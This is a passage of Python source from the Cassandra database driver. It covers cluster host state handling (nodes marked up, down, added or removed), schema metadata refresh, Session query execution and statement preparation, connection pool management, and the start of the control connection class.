def __exit__(self, *args):
self.shutdown()
def _new_session(self):
session = Session(self, self.metadata.all_hosts())
self._session_register_user_types(session)
self.sessions.add(session)
return session
def _session_register_user_types(self, session):
for keyspace, type_map in six.iteritems(self._user_types):
for udt_name, klass in six.iteritems(type_map):
session.user_type_registered(keyspace, udt_name, klass)
def _cleanup_failed_on_up_handling(self, host):
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.remove_pool(host)
self._start_reconnector(host, is_host_addition=False)
def _on_up_future_completed(self, host, futures, results, lock, finished_future):
with lock:
futures.discard(finished_future)
try:
results.append(finished_future.result())
except Exception as exc:
results.append(exc)
if futures:
return
try:
# all futures have completed at this point
for exc in [f for f in results if isinstance(f, Exception)]:
log.error("Unexpected failure while marking node %s up:", host, exc_info=exc)
self._cleanup_failed_on_up_handling(host)
return
if not all(results):
log.debug("Connection pool could not be created, not marking node %s up", host)
self._cleanup_failed_on_up_handling(host)
return
log.info("Connection pools established for node %s", host)
# mark the host as up and notify all listeners
host.set_up()
for listener in self.listeners:
listener.on_up(host)
finally:
with host.lock:
host._currently_handling_node_up = False
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_up(self, host):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
log.debug("Waiting to acquire lock for handling up status of node %s", host)
with host.lock:
if host._currently_handling_node_up:
log.debug("Another thread is already handling up status of node %s", host)
return
if host.is_up:
log.debug("Host %s was already marked up", host)
return
host._currently_handling_node_up = True
log.debug("Starting to handle up status of node %s", host)
have_future = False
futures = set()
try:
log.info("Host %s may be up; will prepare queries and open connection pool", host)
reconnector = host.get_and_set_reconnection_handler(None)
if reconnector:
log.debug("Now that host %s is up, cancelling the reconnection handler", host)
reconnector.cancel()
self._prepare_all_queries(host)
log.debug("Done preparing all queries for host %s, ", host)
for session in self.sessions:
session.remove_pool(host)
log.debug("Signalling to load balancing policy that host %s is up", host)
self.load_balancing_policy.on_up(host)
log.debug("Signalling to control connection that host %s is up", host)
self.control_connection.on_up(host)
log.debug("Attempting to open new connection pools for host %s", host)
futures_lock = Lock()
futures_results = []
callback = partial(self._on_up_future_completed, host, futures, futures_results, futures_lock)
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
have_future = True
future.add_done_callback(callback)
futures.add(future)
except Exception:
log.exception("Unexpected failure handling node %s being marked up:", host)
for future in futures:
future.cancel()
self._cleanup_failed_on_up_handling(host)
with host.lock:
host._currently_handling_node_up = False
raise
else:
if not have_future:
with host.lock:
host._currently_handling_node_up = False
# for testing purposes
return futures
def _start_reconnector(self, host, is_host_addition):
if self.load_balancing_policy.distance(host) == HostDistance.IGNORED:
return
schedule = self.reconnection_policy.new_schedule()
# in order to not hold references to this Cluster open and prevent
# proper shutdown when the program ends, we'll just make a closure
# of the current Cluster attributes to create new Connections with
conn_factory = self._make_connection_factory(host)
reconnector = _HostReconnectionHandler(
host, conn_factory, is_host_addition, self.on_add, self.on_up,
self.scheduler, schedule, host.get_and_set_reconnection_handler,
new_handler=None)
old_reconnector = host.get_and_set_reconnection_handler(reconnector)
if old_reconnector:
log.debug("Old host reconnector found for %s, cancelling", host)
old_reconnector.cancel()
log.debug("Starting reconnector for host %s", host)
reconnector.start()
@run_in_executor
def on_down(self, host, is_host_addition, expect_host_to_be_down=False):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
with host.lock:
if (not host.is_up and not expect_host_to_be_down) or host.is_currently_reconnecting():
return
host.set_down()
log.warning("Host %s has been marked down", host)
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.on_down(host)
for listener in self.listeners:
listener.on_down(host)
self._start_reconnector(host, is_host_addition)
def on_add(self, host, refresh_nodes=True):
if self.is_shutdown:
return
log.debug("Handling new host %r and notifying listeners", host)
distance = self.load_balancing_policy.distance(host)
if distance != HostDistance.IGNORED:
self._prepare_all_queries(host)
log.debug("Done preparing queries for new host %r", host)
self.load_balancing_policy.on_add(host)
self.control_connection.on_add(host, refresh_nodes)
if distance == HostDistance.IGNORED:
log.debug("Not adding connection pool for new host %r because the "
"load balancing policy has marked it as IGNORED", host)
self._finalize_add(host, set_up=False)
return
futures_lock = Lock()
futures_results = []
futures = set()
def future_completed(future):
with futures_lock:
futures.discard(future)
try:
futures_results.append(future.result())
except Exception as exc:
futures_results.append(exc)
if futures:
return
log.debug('All futures have completed for added host %s', host)
for exc in [f for f in futures_results if isinstance(f, Exception)]:
log.error("Unexpected failure while adding node %s, will not mark up:", host, exc_info=exc)
return
if not all(futures_results):
log.warning("Connection pool could not be created, not marking node %s up", host)
return
self._finalize_add(host)
have_future = False
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=True)
if future is not None:
have_future = True
futures.add(future)
future.add_done_callback(future_completed)
if not have_future:
self._finalize_add(host)
def _finalize_add(self, host, set_up=True):
if set_up:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_remove(self, host):
if self.is_shutdown:
return
log.debug("Removing host %s", host)
host.set_down()
self.load_balancing_policy.on_remove(host)
for session in self.sessions:
session.on_remove(host)
for listener in self.listeners:
listener.on_remove(host)
self.control_connection.on_remove(host)
def signal_connection_failure(self, host, connection_exc, is_host_addition, expect_host_to_be_down=False):
is_down = host.signal_connection_failure(connection_exc)
if is_down:
self.on_down(host, is_host_addition, expect_host_to_be_down)
return is_down
def add_host(self, address, datacenter=None, rack=None, signal=True, refresh_nodes=True):
"""
Called when adding initial contact points and when the control
connection subsequently discovers a new node.
Returns a Host instance, and a flag indicating whether it was new in
the metadata.
Intended for internal use only.
"""
host, new = self.metadata.add_or_return_host(Host(address, self.conviction_policy_factory, datacenter, rack))
if new and signal:
log.info("New Cassandra host %r discovered", host)
self.on_add(host, refresh_nodes)
return host, new
def remove_host(self, host):
"""
Called when the control connection observes that a node has left the
ring. Intended for internal use only.
"""
if host and self.metadata.remove_host(host):
log.info("Cassandra host %s removed", host)
self.on_remove(host)
def register_listener(self, listener):
"""
Adds a :class:`cassandra.policies.HostStateListener` subclass instance to
the list of listeners to be notified when a host is added, removed,
marked up, or marked down.
"""
with self._listener_lock:
self._listeners.add(listener)
def unregister_listener(self, listener):
""" Removes a registered listener. """
with self._listener_lock:
self._listeners.remove(listener)
@property
def listeners(self):
with self._listener_lock:
return self._listeners.copy()
def _ensure_core_connections(self):
"""
If any host has fewer than the configured number of core connections
open, attempt to open connections until that number is met.
"""
for session in self.sessions:
for pool in session._pools.values():
pool.ensure_core_connections()
@staticmethod
def _validate_refresh_schema(keyspace, table, usertype, function, aggregate):
if any((table, usertype, function, aggregate)):
if not keyspace:
raise ValueError("keyspace is required to refresh specific sub-entity {table, usertype, function, aggregate}")
if sum(1 for e in (table, usertype, function) if e) > 1:
raise ValueError("{table, usertype, function, aggregate} are mutually exclusive")
@staticmethod
def _target_type_from_refresh_args(keyspace, table, usertype, function, aggregate):
if aggregate:
return SchemaTargetType.AGGREGATE
elif function:
return SchemaTargetType.FUNCTION
elif usertype:
return SchemaTargetType.TYPE
elif table:
return SchemaTargetType.TABLE
elif keyspace:
return SchemaTargetType.KEYSPACE
return None
def refresh_schema_metadata(self, max_schema_agreement_wait=None):
"""
Synchronously refresh all schema metadata.
By default, the timeout for this operation is governed by :attr:`~.Cluster.max_schema_agreement_wait`
and :attr:`~.Cluster.control_connection_timeout`.
Passing max_schema_agreement_wait here overrides :attr:`~.Cluster.max_schema_agreement_wait`.
Setting max_schema_agreement_wait <= 0 will bypass schema agreement and refresh schema immediately.
An Exception is raised if schema refresh fails for any reason.
"""
if not self.control_connection.refresh_schema(schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Schema metadata was not refreshed. See log for details.")
def refresh_keyspace_metadata(self, keyspace, max_schema_agreement_wait=None):
"""
Synchronously refresh keyspace metadata. This applies to keyspace-level information such as replication
and durability settings. It does not refresh tables, types, etc. contained in the keyspace.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.KEYSPACE, keyspace=keyspace,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Keyspace metadata was not refreshed. See log for details.")
def refresh_table_metadata(self, keyspace, table, max_schema_agreement_wait=None):
"""
Synchronously refresh table metadata. This applies to a table, and any triggers or indexes attached
to the table.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=table,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Table metadata was not refreshed. See log for details.")
def refresh_materialized_view_metadata(self, keyspace, view, max_schema_agreement_wait=None):
"""
Synchronously refresh materialized view metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=view,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("View metadata was not refreshed. See log for details.")
def refresh_user_type_metadata(self, keyspace, user_type, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined type metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TYPE, keyspace=keyspace, type=user_type,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Type metadata was not refreshed. See log for details.")
def refresh_user_function_metadata(self, keyspace, function, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined function metadata.
``function`` is a :class:`cassandra.UserFunctionDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.FUNCTION, keyspace=keyspace, function=function,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Function metadata was not refreshed. See log for details.")
def refresh_user_aggregate_metadata(self, keyspace, aggregate, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined aggregate metadata.
``aggregate`` is a :class:`cassandra.UserAggregateDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.AGGREGATE, keyspace=keyspace, aggregate=aggregate,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Aggregate metadata was not refreshed. See log for details.")
def refresh_nodes(self):
"""
Synchronously refresh the node list and token metadata
An Exception is raised if node refresh fails for any reason.
"""
if not self.control_connection.refresh_node_list_and_token_map():
raise DriverException("Node list was not refreshed. See log for details.")
def set_meta_refresh_enabled(self, enabled):
"""
*Deprecated:* set :attr:`~.Cluster.schema_metadata_enabled` :attr:`~.Cluster.token_metadata_enabled` instead
Sets a flag to enable (True) or disable (False) all metadata refresh queries.
This applies to both schema and node topology.
Disabling this is useful to minimize refreshes during multiple changes.
Meta refresh must be enabled for the driver to become aware of any cluster
topology changes or schema updates.
"""
self.schema_metadata_enabled = enabled
self.token_metadata_enabled = enabled
def _prepare_all_queries(self, host):
if not self._prepared_statements or not self.reprepare_on_up:
return
log.debug("Preparing all known prepared statements against host %s", host)
connection = None
try:
connection = self.connection_factory(host.address)
statements = self._prepared_statements.values()
for keyspace, ks_statements in groupby(statements, lambda s: s.keyspace):
if keyspace is not None:
connection.set_keyspace_blocking(keyspace)
# prepare 10 statements at a time
ks_statements = list(ks_statements)
chunks = []
for i in range(0, len(ks_statements), 10):
chunks.append(ks_statements[i:i + 10])
for ks_chunk in chunks:
messages = [PrepareMessage(query=s.query_string) for s in ks_chunk]
# TODO: make this timeout configurable somehow?
responses = connection.wait_for_responses(*messages, timeout=5.0, fail_on_error=False)
for success, response in responses:
if not success:
log.debug("Got unexpected response when preparing "
"statement on host %s: %r", host, response)
log.debug("Done preparing all known prepared statements against host %s", host)
except OperationTimedOut as timeout:
log.warning("Timed out trying to prepare all statements on host %s: %s", host, timeout)
except (ConnectionException, socket.error) as exc:
log.warning("Error trying to prepare all statements on host %s: %r", host, exc)
except Exception:
log.exception("Error trying to prepare all statements on host %s", host)
finally:
if connection:
connection.close()
def add_prepared(self, query_id, prepared_statement):
with self._prepared_statement_lock:
self._prepared_statements[query_id] = prepared_statement
class Session(object):
"""
A collection of connection pools for each host in the cluster.
Instances of this class should not be created directly, only
using :meth:`.Cluster.connect()`.
Queries and statements can be executed through ``Session`` instances
using the :meth:`~.Session.execute()` and :meth:`~.Session.execute_async()`
methods.
Example usage::
>>> session = cluster.connect()
>>> session.set_keyspace("mykeyspace")
>>> session.execute("SELECT * FROM mycf")
"""
cluster = None
hosts = None
keyspace = None
is_shutdown = False
row_factory = staticmethod(named_tuple_factory)
"""
The format to return row results in. By default, each
returned row will be a named tuple. You can alternatively
use any of the following:
- :func:`cassandra.query.tuple_factory` - return a result row as a tuple
- :func:`cassandra.query.named_tuple_factory` - return a result row as a named tuple
- :func:`cassandra.query.dict_factory` - return a result row as a dict
- :func:`cassandra.query.ordered_dict_factory` - return a result row as an OrderedDict
"""
default_timeout = 10.0
"""
A default timeout, measured in seconds, for queries executed through
:meth:`.execute()` or :meth:`.execute_async()`. This default may be
overridden with the `timeout` parameter for either of those methods.
Setting this to :const:`None` will cause no timeouts to be set by default.
Please see :meth:`.ResponseFuture.result` for details on the scope and
effect of this timeout.
.. versionadded:: 2.0.0
"""
default_consistency_level = ConsistencyLevel.LOCAL_ONE
"""
The default :class:`~ConsistencyLevel` for operations executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.consistency_level` on individual statements.
.. versionadded:: 1.2.0
.. versionchanged:: 3.0.0
default changed from ONE to LOCAL_ONE
"""
default_serial_consistency_level = None
"""
The default :class:`~ConsistencyLevel` for serial phase of conditional updates executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.serial_consistency_level` on individual statements.
Only valid for ``protocol_version >= 2``.
"""
max_trace_wait = 2.0
"""
The maximum amount of time (in seconds) the driver will wait for trace
details to be populated server-side for a query before giving up.
If the `trace` parameter for :meth:`~.execute()` or :meth:`~.execute_async()`
is :const:`True`, the driver will repeatedly attempt to fetch trace
details for the query (using exponential backoff) until this limit is
hit. If the limit is passed, an error will be logged and the
:attr:`.Statement.trace` will be left as :const:`None`. """
default_fetch_size = 5000
"""
By default, this many rows will be fetched at a time. Setting
this to :const:`None` will disable automatic paging for large query
results. The fetch size can be also specified per-query through
:attr:`.Statement.fetch_size`.
This only takes effect when protocol version 2 or higher is used.
See :attr:`.Cluster.protocol_version` for details.
.. versionadded:: 2.0.0
"""
use_client_timestamp = True
"""
When using protocol version 3 or higher, write timestamps may be supplied
client-side at the protocol level. (Normally they are generated
server-side by the coordinator node.) Note that timestamps specified
within a CQL query will override this timestamp.
.. versionadded:: 2.1.0
"""
encoder = None
"""
A :class:`~cassandra.encoder.Encoder` instance that will be used when
formatting query parameters for non-prepared statements. This is not used
for prepared statements (because prepared statements give the driver more
information about what CQL types are expected, allowing it to accept a
wider range of python types).
The encoder uses a mapping from python types to encoder methods (for
specific CQL types). This mapping can be be modified by users as they see
fit. Methods of :class:`~cassandra.encoder.Encoder` should be used for mapping
values if possible, because they take precautions to avoid injections and
properly sanitize data.
Example::
cluster = Cluster()
session = cluster.connect("mykeyspace")
session.encoder.mapping[tuple] = session.encoder.cql_encode_tuple
session.execute("CREATE TABLE mytable (k int PRIMARY KEY, col tuple<int, ascii>)")
session.execute("INSERT INTO mytable (k, col) VALUES (%s, %s)", [0, (123, 'abc')])
.. versionadded:: 2.1.0
"""
client_protocol_handler = ProtocolHandler
"""
Specifies a protocol handler that will be used for client-initiated requests (i.e. no
internal driver requests). This can be used to override or extend features such as
message or type ser/des.
The default pure python implementation is :class:`cassandra.protocol.ProtocolHandler`.
When compiled with Cython, there are also built-in faster alternatives. See :ref:`faster_deser`
"""
_lock = None
_pools = None
_load_balancer = None
_metrics = None
def __init__(self, cluster, hosts):
self.cluster = cluster
self.hosts = hosts
self._lock = RLock()
self._pools = {}
self._load_balancer = cluster.load_balancing_policy
self._metrics = cluster.metrics
self._protocol_version = self.cluster.protocol_version
self.encoder = Encoder()
# create connection pools in parallel
futures = []
for host in hosts:
future = self.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
futures.append(future)
for future in futures:
future.result()
def execute(self, query, parameters=None, timeout=_NOT_SET, trace=False, custom_payload=None):
"""
Execute the given query and synchronously wait for the response.
If an error is encountered while executing the query, an Exception
will be raised.
`query` may be a query string or an instance of :class:`cassandra.query.Statement`.
`parameters` may be a sequence or dict of parameters to bind. If a
sequence is used, ``%s`` should be used the placeholder for each
argument. If a dict is used, ``%(name)s`` style placeholders must
be used.
`timeout` should specify a floating-point timeout (in seconds) after
which an :exc:`.OperationTimedOut` exception will be raised if the query
has not completed. If not set, the timeout defaults to
:attr:`~.Session.default_timeout`. If set to :const:`None`, there is
no timeout. Please see :meth:`.ResponseFuture.result` for details on
the scope and effect of this timeout.
If `trace` is set to :const:`True`, the query will be sent with tracing enabled.
The trace details can be obtained using the returned :class:`.ResultSet` object.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload. The message payload
will be a union of the two, with the values specified here taking precedence.
"""
return self.execute_async(query, parameters, trace, custom_payload, timeout).result()
def execute_async(self, query, parameters=None, trace=False, custom_payload=None, timeout=_NOT_SET):
"""
Execute the given query and return a :class:`~.ResponseFuture` object
which callbacks may be attached to for asynchronous response
delivery. You may also call :meth:`~.ResponseFuture.result()`
on the :class:`.ResponseFuture` to syncronously block for results at
any time.
If `trace` is set to :const:`True`, you may get the query trace descriptors using
:meth:`.ResponseFuture.get_query_trace()` or :meth:`.ResponseFuture.get_all_query_traces()`
on the future result.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload. The message payload
will be a union of the two, with the values specified here taking precedence.
If the server sends a custom payload in the response message,
the dict can be obtained following :meth:`.ResponseFuture.result` via
:attr:`.ResponseFuture.custom_payload`
Example usage::
>>> session = cluster.connect()
>>> future = session.execute_async("SELECT * FROM mycf")
>>> def log_results(results):
... for row in results:
... log.info("Results: %s", row)
>>> def log_error(exc):
>>> log.error("Operation failed: %s", exc)
>>> future.add_callbacks(log_results, log_error)
Async execution with blocking wait for results::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... results = future.result()
... except Exception:
... log.exception("Operation failed:")
"""
if timeout is _NOT_SET:
timeout = self.default_timeout
future = self._create_response_future(query, parameters, trace, custom_payload, timeout)
future._protocol_handler = self.client_protocol_handler
future.send_request()
return future
def _create_response_future(self, query, parameters, trace, custom_payload, timeout):
""" Returns the ResponseFuture before calling send_request() on it """
prepared_statement = None
if isinstance(query, six.string_types):
query = SimpleStatement(query)
elif isinstance(query, PreparedStatement):
query = query.bind(parameters)
cl = query.consistency_level if query.consistency_level is not None else self.default_consistency_level
serial_cl = query.serial_consistency_level if query.serial_consistency_level is not None else self.default_serial_consistency_level
fetch_size = query.fetch_size
if fetch_size is FETCH_SIZE_UNSET and self._protocol_version >= 2:
fetch_size = self.default_fetch_size
elif self._protocol_version == 1:
fetch_size = None
if self._protocol_version >= 3 and self.use_client_timestamp:
timestamp = int(time.time() * 1e6)
else:
timestamp = None
if isinstance(query, SimpleStatement):
query_string = query.query_string
if parameters:
query_string = bind_params(query_string, parameters, self.encoder)
message = QueryMessage(
query_string, cl, serial_cl,
fetch_size, timestamp=timestamp)
elif isinstance(query, BoundStatement):
message = ExecuteMessage(
query.prepared_statement.query_id, query.values, cl,
serial_cl, fetch_size,
timestamp=timestamp)
prepared_statement = query.prepared_statement
elif isinstance(query, BatchStatement):
if self._protocol_version < 2:
raise UnsupportedOperation(
"BatchStatement execution is only supported with protocol version "
"2 or higher (supported in Cassandra 2.0 and higher). Consider "
"setting Cluster.protocol_version to 2 to support this operation.")
message = BatchMessage(
query.batch_type, query._statements_and_parameters, cl,
serial_cl, timestamp)
message.tracing = trace
message.update_custom_payload(query.custom_payload)
message.update_custom_payload(custom_payload)
return ResponseFuture(
self, message, query, timeout, metrics=self._metrics,
prepared_statement=prepared_statement)
def prepare(self, query, custom_payload=None):
"""
Prepares a query string, returning a :class:`~cassandra.query.PreparedStatement`
instance which can be used as follows::
>>> session = cluster.connect("mykeyspace")
>>> query = "INSERT INTO users (id, name, age) VALUES (?, ?, ?)"
>>> prepared = session.prepare(query)
>>> session.execute(prepared, (user.id, user.name, user.age))
Or you may bind values to the prepared statement ahead of time::
>>> prepared = session.prepare(query)
>>> bound_stmt = prepared.bind((user.id, user.name, user.age))
>>> session.execute(bound_stmt)
Of course, prepared statements may (and should) be reused::
>>> prepared = session.prepare(query)
>>> for user in users:
... bound = prepared.bind((user.id, user.name, user.age))
... session.execute(bound)
**Important**: PreparedStatements should be prepared only once.
Preparing the same query more than once will likely affect performance.
`custom_payload` is a key value map to be passed along with the prepare
message. See :ref:`custom_payload`.
"""
message = PrepareMessage(query=query)
future = ResponseFuture(self, message, query=None, timeout=self.default_timeout)
try:
future.send_request()
query_id, column_metadata, pk_indexes = future.result()
except Exception:
log.exception("Error preparing query:")
raise
prepared_statement = PreparedStatement.from_message(
query_id, column_metadata, pk_indexes, self.cluster.metadata, query, self.keyspace,
self._protocol_version)
prepared_statement.custom_payload = future.custom_payload
self.cluster.add_prepared(query_id, prepared_statement)
if self.cluster.prepare_on_all_hosts:
host = future._current_host
try:
self.prepare_on_all_hosts(prepared_statement.query_string, host)
except Exception:
log.exception("Error preparing query on all hosts:")
return prepared_statement
def prepare_on_all_hosts(self, query, excluded_host):
"""
Prepare the given query on all hosts, excluding ``excluded_host``.
Intended for internal use only.
"""
futures = []
for host in self._pools.keys():
if host != excluded_host and host.is_up:
future = ResponseFuture(self, PrepareMessage(query=query), None, self.default_timeout)
# we don't care about errors preparing against specific hosts,
# since we can always prepare them as needed when the prepared
# statement is used. Just log errors and continue on.
try:
request_id = future._query(host)
except Exception:
log.exception("Error preparing query for host %s:", host)
continue
if request_id is None:
# the error has already been logged by ResponsFuture
log.debug("Failed to prepare query for host %s: %r",
host, future._errors.get(host))
continue
futures.append((host, future))
for host, future in futures:
try:
future.result()
except Exception:
log.exception("Error preparing query for host %s:", host)
def shutdown(self):
"""
Close all connections. ``Session`` instances should not be used
for any purpose after being shutdown.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
for pool in self._pools.values():
pool.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def add_or_renew_pool(self, host, is_host_addition):
"""
For internal use only.
"""
distance = self._load_balancer.distance(host)
if distance == HostDistance.IGNORED:
return None
def run_add_or_renew_pool():
try:
if self._protocol_version >= 3:
new_pool = HostConnection(host, distance, self)
else:
new_pool = HostConnectionPool(host, distance, self)
except AuthenticationFailed as auth_exc:
conn_exc = ConnectionException(str(auth_exc), host=host)
self.cluster.signal_connection_failure(host, conn_exc, is_host_addition)
return False
except Exception as conn_exc:
log.warning("Failed to create connection pool for new host %s:",
host, exc_info=conn_exc)
# the host itself will still be marked down, so we need to pass
# a special flag to make sure the reconnector is created
self.cluster.signal_connection_failure(
host, conn_exc, is_host_addition, expect_host_to_be_down=True)
return False
previous = self._pools.get(host)
self._pools[host] = new_pool
log.debug("Added pool for host %s to session", host)
if previous:
previous.shutdown()
return True
return self.submit(run_add_or_renew_pool)
def remove_pool(self, host):
pool = self._pools.pop(host, None)
if pool:
log.debug("Removed connection pool for %r", host)
return self.submit(pool.shutdown)
else:
return None
def update_created_pools(self):
"""
When the set of live nodes change, the loadbalancer will change its
mind on host distances. It might change it on the node that came/left
but also on other nodes (for instance, if a node dies, another
previously ignored node may be now considered).
This method ensures that all hosts for which a pool should exist
have one, and hosts that shouldn't don't.
For internal use only.
"""
for host in self.cluster.metadata.all_hosts():
distance = self._load_balancer.distance(host)
pool = self._pools.get(host)
if not pool or pool.is_shutdown:
# we don't eagerly set is_up on previously ignored hosts. None is included here
# to allow us to attempt connections to hosts that have gone from ignored to something
# else.
if distance != HostDistance.IGNORED and host.is_up in (True, None):
self.add_or_renew_pool(host, False)
elif distance != pool.host_distance:
# the distance has changed
if distance == HostDistance.IGNORED:
self.remove_pool(host)
else:
pool.host_distance = distance
def on_down(self, host):
"""
Called by the parent Cluster instance when a node is marked down.
Only intended for internal use.
"""
future = self.remove_pool(host)
if future:
future.add_done_callback(lambda f: self.update_created_pools())
def on_remove(self, host):
""" Internal """
self.on_down(host)
def set_keyspace(self, keyspace):
"""
Set the default keyspace for all queries made through this Session.
This operation blocks until complete.
"""
self.execute('USE %s' % (protect_name(keyspace),))
def _set_keyspace_for_all_pools(self, keyspace, callback):
"""
Asynchronously sets the keyspace on all pools. When all
pools have set all of their connections, `callback` will be
called with a dictionary of all errors that occurred, keyed
by the `Host` that they occurred against.
"""
self.keyspace = keyspace
remaining_callbacks = set(self._pools.values())
errors = {}
if not remaining_callbacks:
callback(errors)
return
def pool_finished_setting_keyspace(pool, host_errors):
remaining_callbacks.remove(pool)
if host_errors:
errors[pool.host] = host_errors
if not remaining_callbacks:
callback(host_errors)
for pool in self._pools.values():
pool._set_keyspace_for_all_conns(keyspace, pool_finished_setting_keyspace)
def user_type_registered(self, keyspace, user_type, klass):
"""
Called by the parent Cluster instance when the user registers a new
mapping from a user-defined type to a class. Intended for internal
use only.
"""
try:
ks_meta = self.cluster.metadata.keyspaces[keyspace]
except KeyError:
raise UserTypeDoesNotExist(
'Keyspace %s does not exist or has not been discovered by the driver' % (keyspace,))
try:
type_meta = ks_meta.user_types[user_type]
except KeyError:
raise UserTypeDoesNotExist(
'User type %s does not exist in keyspace %s' % (user_type, keyspace))
field_names = type_meta.field_names
if six.PY2:
# go from unicode to string to avoid decode errors from implicit
# decode when formatting non-ascii values
field_names = [fn.encode('utf-8') for fn in field_names]
def encode(val):
return '{ %s }' % ' , '.join('%s : %s' % (
field_name,
self.encoder.cql_encode_all_types(getattr(val, field_name, None))
) for field_name in field_names)
self.encoder.mapping[klass] = encode
def submit(self, fn, *args, **kwargs):
""" Internal """
if not self.is_shutdown:
return self.cluster.executor.submit(fn, *args, **kwargs)
def get_pool_state(self):
return dict((host, pool.get_state()) for host, pool in self._pools.items())
def get_pools(self):
return self._pools.values()
class UserTypeDoesNotExist(Exception):
"""
An attempt was made to use a user-defined type that does not exist.
.. versionadded:: 2.1.0
"""
pass
class _ControlReconnectionHandler(_ReconnectionHandler):
"""
Internal
"""
def __init__(self, control_connection, *args, **kwargs):
_ReconnectionHandler.__init__(self, *args, **kwargs)
self.control_connection = weakref.proxy(control_connection)
def try_reconnect(self):
return self.control_connection._reconnect_internal()
def on_reconnection(self, connection):
self.control_connection._set_new_connection(connection)
def on_exception(self, exc, next_delay):
# TODO only overridden to add logging, so add logging
if isinstance(exc, AuthenticationFailed):
return False
else:
log.debug("Error trying to reconnect control connection: %r", exc)
return True
def _watch_callback(obj_weakref, method_name, *args, **kwargs):
"""
A callback handler for the ControlConnection that tolerates
weak references.
"""
obj = obj_weakref()
if obj is None:
return
getattr(obj, method_name)(*args, **kwargs)
def _clear_watcher(conn, expiring_weakref):
"""
Called when the ControlConnection object is about to be finalized.
This clears watchers on the underlying Connection object.
"""
try:
conn.control_conn_disposed()
except ReferenceError:
pass
class ControlConnection(object):
"""
Internal
"""
_SELECT_PEERS = "SELECT * FROM system.peers"
_SELECT_PEERS_NO_TOKENS = "SELECT peer, data_center, rack, rpc_address, release_version, schema_version FROM system.peers"
_SELECT_LOCAL = "SELECT * FROM system.local WHERE key='local'"
_SELECT_LOCAL_NO_TOKENS = "SELECT cluster_name, data_center, rack, partitioner, release_version, schema_version FROM system.local WHERE key='local'"
_SELECT_SCHEMA_PEERS = "SELECT peer, rpc_address, schema_version FROM system.peers"
_SELECT_SCHEMA_LOCAL = "SELECT schema_version FROM system.local WHERE key='local'"
_is_shutdown = False
_timeout = None
_protocol_version = None
_schema_event_refresh_window = None
_topology_event_refresh_window = None
_status_event_refresh_window = None
_schema_meta_enabled = True
_token_meta_enabled = True
# for testing purposes
_time = time
def __init__(self, cluster, timeout,
schema_event_refresh_window,
topology_event_refresh_window,
status_event_refresh_window,
schema_meta_enabled=True,
token_meta_enabled=True):
# use a weak reference to allow the Cluster instance to be GC'ed (and
# shutdown) since implementing __del__ disables the cycle detector
self._cluster = weakref.proxy(cluster)
self._connection = None
self._timeout = timeout
self._schema_event_refresh_window = schema_event_refresh_window
self._topology_event_refresh_window = topology_event_refresh_window
self._status_event_refresh_window = status_event_refresh_window
self._schema_meta_enabled = schema_meta_enabled
self._token_meta_enabled = token_meta_enabled
self._lock = RLock()
self._schema_agreement_lock = Lock()
self._reconnection_handler = None
self._reconnection_lock = RLock()
self._event_schedule_times = {}
def connect(self):
if self._is_shutdown:
return
self._protocol_version = self._cluster.protocol_version
self._set_new_connection(self._reconnect_internal())
def _set_new_connection(self, conn):
"""
Replace existing connection (if there is one) and close it.
"""
with self._lock:
old = self._connection
self._connection = conn
if old:
log.debug("[control connection] Closing old connection %r, replacing with %r", old, conn)
old.close()
def _reconnect_internal(self):
"""
Tries to connect to each host in the query plan until one succeeds
or every attempt fails. If successful, a new Connection will be
returned. Otherwise, :exc:`NoHostAvailable` will be raised
with an "errors" arg that is a dict mapping host addresses
to the exception that was raised when an attempt was made to open
a connection to that host.
"""
errors = {}
for host in self._cluster.load_balancing_policy.make_query_plan():
try:
return self._try_connect(host)
except ConnectionException as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
